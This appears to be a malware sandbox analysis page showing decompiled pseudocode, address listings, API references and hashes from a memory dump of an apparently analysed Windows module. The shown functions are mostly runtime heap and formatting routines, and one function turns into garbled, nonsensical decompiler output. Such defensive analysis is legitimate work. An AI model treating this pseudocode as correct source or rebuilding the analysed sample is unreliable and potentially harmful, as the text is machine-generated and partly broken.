													__eflags =  *(_t220 + 4);
													if( *(_t220 + 4) != 0) {
														_t167 =  *_t267;
														__eflags =  *((intOrPtr*)(_t220 + 8)) - 9;
														if( *((intOrPtr*)(_t220 + 8)) >= 9) {
															_t167 =  *(_t167 - 4);
														}
														HeapFree( *0x6e4fadc8, 0, _t167);
													}
													HeapFree( *0x6e4fadc8, 0, _t267);
												}
											}
											__eflags = _v80 & 0x7fffffff;
											if((_v80 & 0x7fffffff) != 0) {
												HeapFree( *0x6e4fadc8, 0, _v36);
											}
											goto L76;
										} else {
											goto L71;
										}
									}
								}
							} else {
								_t228 = _t242;
								_t268 = _t148;
								while(1) {
									__eflags =  *_t268;
									if( *_t268 == 0) {
										break;
									}
									__eflags =  *((short*)(_t268 + 2));
									if( *((short*)(_t268 + 2)) == 0) {
										break;
									} else {
										__eflags =  *((short*)(_t268 + 4));
										if( *((short*)(_t268 + 4)) == 0) {
											break;
										} else {
											__eflags =  *((short*)(_t268 + 6));
											if( *((short*)(_t268 + 6)) == 0) {
												break;
											} else {
												__eflags =  *((short*)(_t268 + 8));
												if( *((short*)(_t268 + 8)) == 0) {
													break;
												} else {
													__eflags =  *((short*)(_t268 + 0xa));
													if( *((short*)(_t268 + 0xa)) == 0) {
														break;
													} else {
														__eflags =  *((short*)(_t268 + 0xc));
														if( *((short*)(_t268 + 0xc)) == 0) {
															break;
														} else {
															__eflags =  *((short*)(_t268 + 0xe));
															if( *((short*)(_t268 + 0xe)) == 0) {
																break;
															} else {
																_t228 = _t228 + 0xfffffff8;
																_t268 = _t268 + 0x10;
																__eflags = _t228 - 7;
																if(_t228 > 7) {
																	continue;
																} else {
																	goto L45;
																}
															}
														}
													}
												}
											}
										}
									}
									goto L96;
								}
								L48:
								_t223 = _v68;
								_v56 = 0x6e4edec8;
								_v60 = 0x1402;
								__eflags = _t223;
								if(_t223 != 0) {
									__eflags = _t148;
									if(_t148 != 0) {
										__eflags = _t223 & 0x7fffffff;
										if((_t223 & 0x7fffffff) != 0) {
											HeapFree( *0x6e4fadc8, 0, _t148);
										}
									}
								}
								__eflags = _v60 - 3;
								if(_v60 == 3) {
									_t224 = _v56;
									_v36 = _t224;
									_t70 = _t224 + 4; // 0x2c
									_v20 = 2;
									 *((intOrPtr*)( *_t70))( *_t224);
									_t281 = _t281 + 4;
									_t179 = _v36;
									_t226 =  *((intOrPtr*)(_t179 + 4));
									__eflags =  *(_t226 + 4);
									if( *(_t226 + 4) != 0) {
										_t181 =  *_t179;
										__eflags =  *((intOrPtr*)(_t226 + 8)) - 9;
										if( *((intOrPtr*)(_t226 + 8)) >= 9) {
											_t181 =  *(_t181 - 4);
										}
										HeapFree( *0x6e4fadc8, 0, _t181);
										_t179 = _v56;
									}
									HeapFree( *0x6e4fadc8, 0, _t179);
								}
								L75:
								 *_v76 = 0;
								L76:
								_t151 = _v28;
								 *[fs:0x0] = _t151;
								return _t151;
							}
							goto L96;
						}
					}
				} else {
					_t142 = GetProcessHeap();
					if(_t142 == 0) {
						L94:
						_t239 = 2;
						E6E4C6C30(_t192, 0xa, 2, _t245, _t262, __eflags);
						asm("ud2");
						L95:
						E6E4C6DB0(_t192, _t245, _t239, _t245, _t262, __eflags, 0x6e4eded0);
						asm("ud2");
						__eflags =  &_a8;
						E6E4A4AA0( *_v44,  *((intOrPtr*)(_v44 + 4)));
						return E6E4AD420(_t263);
					} else {
						 *0x6e4fadc8 = _t142;
						goto L3;
					}
				}
				L96:
			}







































































                          0x6e4ad530
                          0x6e4ad530
                          0x6e4ad530
                          0x6e4ad533
                          0x6e4ad534
                          0x6e4ad535
                          0x6e4ad536
                          0x6e4ad53c
                          0x6e4ad53f
                          0x6e4ad546
                          0x6e4ad54d
                          0x6e4ad55a
                          0x6e4ad55d
                          0x6e4ad563
                          0x6e4ad56a
                          0x6e4ad57e
                          0x6e4ad583
                          0x6e4ad58a
                          0x00000000
                          0x6e4ad590
                          0x6e4ad590
                          0x6e4ad596
                          0x6e4ad59b
                          0x6e4ad59d
                          0x6e4ad5a2
                          0x6e4ad5a8
                          0x6e4ad5b2
                          0x6e4ad5bc
                          0x6e4ad5ed
                          0x6e4ad5f0
                          0x6e4ad5f3
                          0x00000000
                          0x00000000
                          0x6e4ad5f5
                          0x6e4ad5fc
                          0x6e4ad604
                          0x6e4ad5df
                          0x6e4ad5df
                          0x6e4ad5e2
                          0x6e4ad5e6
                          0x6e4ad5e7
                          0x00000000
                          0x6e4ad606
                          0x6e4ad63a
                          0x6e4ad644
                          0x6e4ad647
                          0x6e4ad64e
                          0x6e4ad659
                          0x6e4ad662
                          0x6e4ad66a
                          0x6e4ad66d
                          0x6e4ad671
                          0x6e4ad676
                          0x6e4ad5d0
                          0x6e4ad5d6
                          0x6e4ad5d9
                          0x6e4ad5dc
                          0x00000000
                          0x6e4ad5dc
                          0x6e4ad610
                          0x6e4ad616
                          0x6e4ad618
                          0x6e4ad61e
                          0x6e4ad621
                          0x6e4ad624
                          0x6e4ad627
                          0x6e4ad629
                          0x6e4ad681
                          0x6e4ad68a
                          0x6e4ad68c
                          0x6e4ad6b3
                          0x6e4ad6bb
                          0x6e4ad6be
                          0x6e4ad6c3
                          0x6e4ad6c6
                          0x00000000
                          0x6e4ad6c8
                          0x6e4ad6c8
                          0x6e4ad6cc
                          0x6e4ad6d2
                          0x6e4ad6d4
                          0x6e4ad6da
                          0x00000000
                          0x6e4ad6e0
                          0x00000000
                          0x6e4ad6e0
                          0x6e4ad6da
                          0x6e4ad68e
                          0x6e4ad68e
                          0x6e4ad692
                          0x6e4ad695
                          0x6e4ad698
                          0x6e4ad69b
                          0x6e4ad6eb
                          0x6e4ad6ed
                          0x6e4ad6f3
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4ad69d
                          0x6e4ad6a3
                          0x6e4ad6a5
                          0x6e4ad715
                          0x6e4ad715
                          0x6e4ad717
                          0x6e4ad6a7
                          0x6e4ad6ab
                          0x6e4ad6ae
                          0x6e4ad6ae
                          0x6e4ad71a
                          0x6e4ad71d
                          0x6e4ad71f
                          0x6e4ad722
                          0x6e4ad745
                          0x6e4ad747
                          0x6e4ad74a
                          0x6e4ad750
                          0x00000000
                          0x6e4ad752
                          0x00000000
                          0x6e4ad752
                          0x6e4ad724
                          0x6e4ad724
                          0x6e4ad72d
                          0x6e4ad72f
                          0x6e4ad75a
                          0x6e4ad75a
                          0x6e4ad75c
                          0x6e4ad731
                          0x6e4ad737
                          0x6e4ad73a
                          0x6e4ad73a
                          0x6e4ad76f
                          0x6e4ad771
                          0x6e4ad774
                          0x6e4ad77a
                          0x6e4ad6f9
                          0x6e4ad6f9
                          0x6e4ad6fc
                          0x6e4ad6fe
                          0x6e4ad704
                          0x00000000
                          0x6e4ad70a
                          0x00000000
                          0x6e4ad70a
                          0x6e4ad780
                          0x6e4ad780
                          0x6e4ad780
                          0x6e4ad786
                          0x6e4ad7a0
                          0x6e4ad7a3
                          0x6e4ad7a6
                          0x6e4ad7a8
                          0x6e4ad7ab
                          0x6e4ad7b1
                          0x00000000
                          0x6e4ad7b7
                          0x00000000
                          0x6e4ad7b7
                          0x6e4ad7b1
                          0x6e4ad77a
                          0x6e4ad722
                          0x6e4ad69b
                          0x6e4ad62b
                          0x6e4ad62b
                          0x6e4ad62d
                          0x6e4ad630
                          0x6e4ad632
                          0x6e4ad638
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4ad638
                          0x00000000
                          0x6e4ad629
                          0x6e4ad7bc
                          0x6e4ad7c2
                          0x6e4ad7ca
                          0x6e4ad7cd
                          0x6e4ad7d2
                          0x6e4ad7d5
                          0x6e4ad7d7
                          0x6e4ad7da
                          0x6e4ad7dc
                          0x6e4ad824
                          0x6e4ad824
                          0x6e4ad826
                          0x6e4ad830
                          0x6e4ad830
                          0x6e4ad832
                          0x00000000
                          0x00000000
                          0x6e4ad838
                          0x6e4ad83b
                          0x6e4ad83f
                          0x6e4ad842
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4ad842
                          0x6e4ad8d0
                          0x6e4ad8d3
                          0x6e4ad8d5
                          0x6e4ad8e1
                          0x6e4ad8e6
                          0x6e4ad8e9
                          0x6e4ad8ec
                          0x6e4ad8ec
                          0x6e4ad8ef
                          0x6e4ad8f5
                          0x6e4ad8fa
                          0x6e4ad8ff
                          0x6e4ad902
                          0x6e4ad904
                          0x6e4ad907
                          0x00000000
                          0x6e4ad90d
                          0x6e4ad910
                          0x6e4ad921
                          0x6e4ad926
                          0x6e4ad929
                          0x6e4ad92e
                          0x6e4ad933
                          0x6e4ad935
                          0x6e4ad938
                          0x6e4ad93f
                          0x6e4ad942
                          0x6e4ad949
                          0x6e4ad94f
                          0x6e4ad972
                          0x6e4ad977
                          0x6e4ad97b
                          0x6e4ad97d
                          0x6e4ad97f
                          0x6e4ad982
                          0x6e4ad98f
                          0x6e4ad994
                          0x6e4ad99a
                          0x6e4ad99d
                          0x6e4ad99d
                          0x6e4ad9a0
                          0x6e4ad9a3
                          0x6e4ad9a5
                          0x6e4ad9a8
                          0x6e4ad951
                          0x6e4ad9b0
                          0x6e4ad9b0
                          0x6e4ad9b6
                          0x6e4ad9b6
                          0x6e4ad9bd
                          0x6e4ad9bd
                          0x6e4ad9c2
                          0x6e4ad9cd
                          0x6e4ad9d3
                          0x6e4ad9d5
                          0x6e4ad9d7
                          0x6e4ad9e3
                          0x6e4ad9e3
                          0x6e4ad9e5
                          0x6e4ad960
                          0x6e4ad960
                          0x6e4ad962
                          0x6e4ad964
                          0x6e4ada26
                          0x6e4ada29
                          0x6e4ada30
                          0x6e4ada32
                          0x00000000
                          0x6e4ada38
                          0x6e4ada3e
                          0x6e4ada3f
                          0x6e4ada44
                          0x6e4ada47
                          0x6e4ada4a
                          0x6e4ada4d
                          0x6e4ada50
                          0x6e4ada52
                          0x6e4ada55
                          0x6e4ada57
                          0x00000000
                          0x00000000
                          0x6e4ada59
                          0x00000000
                          0x6e4ada57
                          0x6e4ad96a
                          0x6e4ad96a
                          0x6e4ad970
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4ad970
                          0x6e4ad9eb
                          0x6e4ad9eb
                          0x6e4ad9f1
                          0x6e4ad9f4
                          0x00000000
                          0x6e4ad9fa
                          0x6e4ad9fa
                          0x6e4ad9fc
                          0x6e4ada02
                          0x00000000
                          0x6e4ada04
                          0x00000000
                          0x6e4ada04
                          0x00000000
                          0x6e4ada02
                          0x6e4ad9f4
                          0x6e4ad9d9
                          0x6e4ad9d9
                          0x6e4ad9df
                          0x6e4ad9e1
                          0x6e4ada5b
                          0x6e4ada5d
                          0x6e4ada63
                          0x6e4ada65
                          0x6e4ada67
                          0x6e4ada6a
                          0x6e4ada6c
                          0x6e4ada6e
                          0x6e4ada6e
                          0x6e4ada72
                          0x6e4ada74
                          0x6e4ada79
                          0x6e4ada86
                          0x6e4ada89
                          0x6e4ada8e
                          0x6e4ada8e
                          0x6e4ada79
                          0x6e4ada72
                          0x6e4ada91
                          0x6e4ada91
                          0x6e4ada93
                          0x6e4adaed
                          0x6e4adaf0
                          0x6e4adaf2
                          0x6e4adaf5
                          0x6e4ada95
                          0x6e4ada98
                          0x6e4ada9b
                          0x6e4adaa1
                          0x6e4adaa8
                          0x6e4adab0
                          0x6e4adab3
                          0x6e4adab5
                          0x6e4adab8
                          0x6e4adabb
                          0x6e4adabe
                          0x6e4adac2
                          0x6e4adac4
                          0x6e4adac6
                          0x6e4adaca
                          0x6e4adacc
                          0x6e4adacc
                          0x6e4adad8
                          0x6e4adad8
                          0x6e4adae6
                          0x6e4adae6
                          0x6e4adaa1
                          0x6e4adaf8
                          0x6e4adaff
                          0x6e4adb10
                          0x6e4adb10
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4ad9e1
                          0x6e4ad9d7
                          0x6e4ad7de
                          0x6e4ad7de
                          0x6e4ad7e0
                          0x6e4ad7e2
                          0x6e4ad7e2
                          0x6e4ad7e6
                          0x00000000
                          0x00000000
                          0x6e4ad7e8
                          0x6e4ad7ed
                          0x00000000
                          0x6e4ad7ef
                          0x6e4ad7ef
                          0x6e4ad7f4
                          0x00000000
                          0x6e4ad7f6
                          0x6e4ad7f6
                          0x6e4ad7fb
                          0x00000000
                          0x6e4ad7fd
                          0x6e4ad7fd
                          0x6e4ad802
                          0x00000000
                          0x6e4ad804
                          0x6e4ad804
                          0x6e4ad809
                          0x00000000
                          0x6e4ad80b
                          0x6e4ad80b
                          0x6e4ad810
                          0x00000000
                          0x6e4ad812
                          0x6e4ad812
                          0x6e4ad817
                          0x00000000
                          0x6e4ad819
                          0x6e4ad819
                          0x6e4ad81c
                          0x6e4ad81f
                          0x6e4ad822
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4ad822
                          0x6e4ad817
                          0x6e4ad810
                          0x6e4ad809
                          0x6e4ad802
                          0x6e4ad7fb
                          0x6e4ad7f4
                          0x00000000
                          0x6e4ad7ed
                          0x6e4ad844
                          0x6e4ad844
                          0x6e4ad847
                          0x6e4ad84e
                          0x6e4ad855
                          0x6e4ad857
                          0x6e4ad859
                          0x6e4ad85b
                          0x6e4ad85d
                          0x6e4ad863
                          0x6e4ad86e
                          0x6e4ad86e
                          0x6e4ad863
                          0x6e4ad85b
                          0x6e4ad873
                          0x6e4ad877
                          0x6e4ad87d
                          0x6e4ad882
                          0x6e4ad885
                          0x6e4ad888
                          0x6e4ad890
                          0x6e4ad892
                          0x6e4ad895
                          0x6e4ad898
                          0x6e4ad89b
                          0x6e4ad89f
                          0x6e4ad8a1
                          0x6e4ad8a3
                          0x6e4ad8a7
                          0x6e4ad8a9
                          0x6e4ad8a9
                          0x6e4ad8b5
                          0x6e4ad8ba
                          0x6e4ad8ba
                          0x6e4ad8c6
                          0x6e4ad8c6
                          0x6e4ada09
                          0x6e4ada0c
                          0x6e4ada12
                          0x6e4ada12
                          0x6e4ada15
                          0x6e4ada25
                          0x6e4ada25
                          0x00000000
                          0x6e4ad7dc
                          0x6e4ad5ed
                          0x6e4ad56c
                          0x6e4ad56c
                          0x6e4ad573
                          0x6e4adb1a
                          0x6e4adb1f
                          0x6e4adb24
                          0x6e4adb29
                          0x6e4adb2b
                          0x6e4adb32
                          0x6e4adb3a
                          0x6e4adb44
                          0x6e4adb4f
                          0x6e4adb5f
                          0x6e4ad579
                          0x6e4ad579
                          0x00000000
                          0x6e4ad579
                          0x6e4ad573
                          0x00000000

                          APIs
                          • GetProcessHeap.KERNEL32 ref: 6E4AD56C
                          • HeapAlloc.KERNEL32(00B00000,00000000,0000000A), ref: 6E4AD583
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.945815287.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000002.00000002.945810067.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945859706.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945922309.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945930266.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945936829.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Heap$AllocProcess
                          • String ID: RUST_BACKTRACE
                          • API String ID: 1617791916-3454309823
                          • Opcode ID: 0c5f7bd75d09e436c601981dd3fc7f3283db205e979772c98a59bb758ecb30ba
                          • Instruction ID: 06ca22c6e0f9ca6aa4e73a3d960da5097dbe205bfeb7f7f5aa7c0b75468d0282
                          • Opcode Fuzzy Hash: 0c5f7bd75d09e436c601981dd3fc7f3283db205e979772c98a59bb758ecb30ba
                          • Instruction Fuzzy Hash: A302BEB1E002198BDB14CFF8D890BDDB7B1AF99328F15411ADA25B7384D771A941CF91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4A77B4, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 423COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 81%
                          			E6E4A77B4(signed int __ecx, void* __eflags) {
				intOrPtr _t127;
				signed int _t129;
				signed int _t130;
				signed int _t131;
				signed int _t133;
				void* _t134;
				intOrPtr* _t136;
				intOrPtr* _t138;
				intOrPtr* _t140;
				intOrPtr* _t150;
				intOrPtr* _t153;
				intOrPtr* _t154;
				signed int* _t155;
				signed int _t157;
				signed int _t158;
				signed int _t162;
				signed int _t164;
				signed int _t165;
				signed int _t167;
				signed int _t170;
				signed int _t171;
				void* _t173;
				void* _t175;
				signed int _t176;
				signed int _t180;
				signed int _t181;
				signed int _t183;
				signed int _t184;
				signed int _t196;
				void* _t198;
				void* _t200;
				signed char _t201;
				signed int* _t203;
				signed char _t204;
				signed int _t207;
				signed char _t208;
				intOrPtr _t212;
				signed int _t215;
				signed int _t216;
				signed int _t218;
				char* _t220;
				char* _t221;
				signed int _t222;
				signed int _t225;
				signed int _t226;
				signed int _t238;
				signed int _t239;
				signed int _t241;
				signed int _t245;
				intOrPtr _t250;
				signed char _t251;
				signed int _t258;
				intOrPtr _t268;
				unsigned int _t273;
				void* _t281;
				char* _t282;
				signed short _t286;
				signed int _t288;
				signed int _t290;
				signed int _t291;
				signed int _t292;
				char* _t295;
				signed int _t303;
				signed int _t307;
				void* _t308;
				void* _t311;
				void* _t312;
				signed int* _t313;
				void* _t316;

				_pop(_t127);
				if(__eflags != 0) {
					 *((intOrPtr*)(_t308 + 0x10)) = _t250;
					_t251 =  *(__ecx + 4);
					 *((intOrPtr*)(_t308 + 0x14)) = _t127;
					 *(_t308 + 4) = __ecx;
					__eflags = _t251;
					if(_t251 == 0) {
						L19:
						_t288 =  *(_t308 + 4);
						_t214 =  *(_t288 + 0x14);
						__eflags =  *(_t288 + 0x14);
						if( *(_t288 + 0x14) == 0) {
							L21:
							 *_t288 = 1;
							goto L22;
						} else {
							_push(0x10);
							_t129 = E6E4A1DE0(_t214,  &M6E4ECB85);
							_t215 = 1;
							__eflags = _t129;
							if(_t129 == 0) {
								goto L21;
							}
						}
						goto L23;
					} else {
						_t130 =  *(_t308 + 4);
						_t216 =  *(_t130 + 0xc);
						_t131 =  *(_t130 + 8);
						__eflags = _t216 - _t131;
						 *(_t308 + 0xc) = _t216;
						 *(_t308 + 8) = _t131;
						if(_t216 < _t131) {
							_t290 =  *(_t308 + 4);
							_t279 = 0xffffffff;
							_t133 =  *(_t308 + 0xc) + 1;
							__eflags = _t133;
							_t218 =  ~( *(_t308 + 8));
							while(1) {
								__eflags = _t218 + _t133 - 1;
								if(_t218 + _t133 == 1) {
									goto L19;
								}
								_t196 =  *(_t251 + _t133 - 1) & 0x000000ff;
								 *(_t290 + 0xc) = _t133;
								_t133 = _t133 + 1;
								_t279 = _t279 + 1;
								_t198 = _t196 + 0xd0;
								__eflags = _t198 - 0xa;
								if(_t198 < 0xa) {
									continue;
								} else {
									_t200 = _t198 + 0x9f;
									__eflags = _t200 - 6;
									if(_t200 < 6) {
										continue;
									} else {
										__eflags = _t200 - 0x5f;
										if(_t200 != 0x5f) {
											goto L19;
										} else {
											_t291 =  *(_t308 + 0xc);
											_t134 = _t133 + 0xfffffffe;
											_t201 = _t251;
											__eflags = _t134 - _t291;
											if(_t134 < _t291) {
												L38:
												E6E4C6F60(_t201,  *(_t308 + 8), _t291, _t134, 0x6e4ecb2c);
												_t311 = _t308 + 0xc;
												asm("ud2");
												goto L39;
											} else {
												__eflags = _t291;
												if(_t291 == 0) {
													L13:
													_t209 = _t201 + _t291;
													_t268 = _t308 + 0x18;
													 *((intOrPtr*)(_t308 + 0x18)) = _t201 + _t291;
													 *(_t308 + 0x1c) = _t279;
													E6E4A8720(_t308 + 0x20, _t268);
													__eflags =  *(_t308 + 0x20);
													if( *(_t308 + 0x20) == 0) {
														_t291 =  *( *(_t308 + 4) + 0x14);
														__eflags = _t291;
														if(_t291 == 0) {
															goto L22;
														} else {
															_push(2);
															_t180 = E6E4A1DE0(_t291, 0x6e4ecc17);
															_t316 = _t308 + 4;
															_t215 = 1;
															__eflags = _t180;
															if(_t180 != 0) {
																goto L23;
															} else {
																_push(_t279);
																_t181 = E6E4A1DE0(_t291, _t209);
																_t215 = 1;
																_t311 = _t316 + 4;
																goto L34;
															}
														}
													} else {
														_t183 =  *( *(_t308 + 4) + 0x14);
														__eflags = _t183;
														if(_t183 == 0) {
															goto L22;
														} else {
															 *(_t308 + 8) = _t183;
															_t212 =  *((intOrPtr*)(_t308 + 0x2c));
															_t184 =  *(_t308 + 0x28);
															__eflags = _t184 - 0x2710;
															asm("sbb ecx, 0x0");
															if(_t184 < 0x2710) {
																_t238 = 0x27;
															} else {
																_t241 = 0x27;
																asm("o16 nop [cs:eax+eax]");
																do {
																	 *(_t308 + 4) = _t241;
																	 *(_t308 + 0xc) = _t184;
																	_t286 = E6E4B9F10(_t184, _t212, 0x2710, 0);
																	_t184 = E6E4B9F90(_t184, _t212, 0x2710, 0);
																	_t245 = ((_t286 & 0x0000ffff) >> 2) * 0x147b >> 0x11;
																	__eflags = 0x5f5e0ff -  *(_t308 + 0xc);
																	asm("sbb esi, ebx");
																	_t303 =  *(_t308 + 4);
																	_t212 = _t268;
																	 *((short*)(_t308 + _t303 + 0x31)) =  *(_t245 + _t245 + 0x6e4eb61c) & 0x0000ffff;
																	 *((short*)(_t308 + _t303 + 0x33)) =  *((_t286 - _t245 * 0x00000064 & 0x0000ffff) + (_t286 - _t245 * 0x00000064 & 0x0000ffff) + 0x6e4eb61c) & 0x0000ffff;
																	_t241 = _t303 - 4;
																} while (0x5f5e0ff <  *(_t308 + 0xc));
															}
															_t279 =  *(_t308 + 8);
															__eflags = _t184 - 0x63;
															if(_t184 > 0x63) {
																_t273 = _t184 & 0x0000ffff;
																_t184 = (_t273 >> 2) * 0x147b >> 0x11;
																 *((short*)(_t308 + _t238 + 0x33)) =  *((_t273 - _t184 * 0x00000064 & 0x0000ffff) + (_t273 - _t184 * 0x00000064 & 0x0000ffff) + 0x6e4eb61c) & 0x0000ffff;
																_t238 = _t238 + 0xfffffffe;
																__eflags = _t238;
															}
															__eflags = _t184 - 0xa;
															if(_t184 >= 0xa) {
																 *((short*)(_t308 + _t238 + 0x33)) =  *(_t184 + _t184 + 0x6e4eb61c) & 0x0000ffff;
																_t239 = _t238 + 0xfffffffe;
																__eflags = _t239;
															} else {
																 *((char*)(_t308 + _t238 + 0x34)) = _t184 + 0x30;
																_t239 = _t238 - 1;
															}
															__eflags = 0x27;
															_push(0x27 - _t239);
															_t291 = _t279;
															_push(_t308 + _t239 + 0x35);
															_push(0);
															_t181 = E6E4A1AA0(_t279, 0x6e4ecd60);
															_t311 = _t308 + 0xc;
															_t215 = 1;
															L34:
															__eflags = _t181;
															if(_t181 != 0) {
																goto L23;
															} else {
																__eflags =  *_t291 & 0x00000004;
																if(( *_t291 & 0x00000004) != 0) {
																	goto L22;
																} else {
																	_t201 =  *((intOrPtr*)(_t311 + 0x10)) + 0x9f;
																	__eflags = _t201 - 0x19;
																	if(__eflags <= 0) {
																		_t279 = _t201 & 0x000000ff;
																		_t134 = 4;
																		_t201 =  *((intOrPtr*)(_t311 + 0x14)) +  *((intOrPtr*)(0x6e4a7b98 + (_t201 & 0x000000ff) * 4));
																		goto __ebx;
																	}
																	L39:
																	_t220 = "called `Option::unwrap()` on a `None` value";
																	_t136 = E6E4C6E20(_t201, _t220, 0x2b, _t279, _t291, __eflags, 0x6e4ecc1c);
																	_t312 = _t311 + 4;
																	asm("ud2");
																	asm("stosb");
																	 *((intOrPtr*)(_t220 - 0x46fffffd)) =  *((intOrPtr*)(_t220 - 0x46fffffd)) + _t201;
																	_t138 = _t136 +  *_t136 +  *((intOrPtr*)(_t136 +  *_t136));
																	_t140 = _t138 +  *_t138 +  *((intOrPtr*)(_t138 +  *_t138));
																	_t221 =  &(_t220[_t140]);
																	_t203 = _t201 + _t138 + _t201 + _t138;
																	 *_t291 =  *_t291 + _t221;
																	 *0x2b =  *0x2b + _t203;
																	_t150 = _t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)))) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)))))) + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)))) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)))))) + _t221)) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)))) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)))))) + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)))) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)))))) + _t221))));
																	 *_t291 =  *_t291 + _t150;
																	 *0x2b =  *0x2b + 0x56;
																	 *_t221 =  *_t221 + _t203;
																	_t153 = _t150 +  *_t150 +  *((intOrPtr*)(_t150 +  *_t150)) +  *((intOrPtr*)(_t150 +  *_t150 +  *((intOrPtr*)(_t150 +  *_t150))));
																	 *((intOrPtr*)(_t153 + 3)) =  *((intOrPtr*)(_t153 + 3)) + _t153;
																	 *_t153 =  *_t153 + _t153;
																	asm("enter 0x3, 0x0");
																	asm("enter 0x3, 0x0");
																	_t154 = _t153 +  *_t153;
																	_t203[0] = _t203[0] + 0x56;
																	 *_t154 =  *_t154 + _t154;
																	_pop(_t281);
																	_t155 = _t154 +  *_t154;
																	_t203[0] = _t203[0] + _t221;
																	 *_t155 = _t155 +  *_t155;
																	__eflags =  *_t155;
																	asm("enter 0x3, 0x0");
																	if( *_t155 <= 0) {
																		 *_t155 = _t155 +  *_t155;
																		 *_t203 =  *_t203;
																		__eflags =  *_t203;
																	}
																	_t76 = _t281 + 0x55000003;
																	 *_t76 =  *(_t281 + 0x55000003) + _t221;
																	__eflags =  *_t76;
																	_push(_t203);
																	_push(_t281);
																	_push(_t291);
																	_t313 = _t312 - 0x24;
																	__eflags =  *_t221 - 1;
																	_t282 = _t221;
																	if( *_t221 != 1) {
																		_t222 =  *(_t282 + 8);
																		_t292 =  *(_t282 + 0xc);
																		_t157 =  *(_t282 + 4);
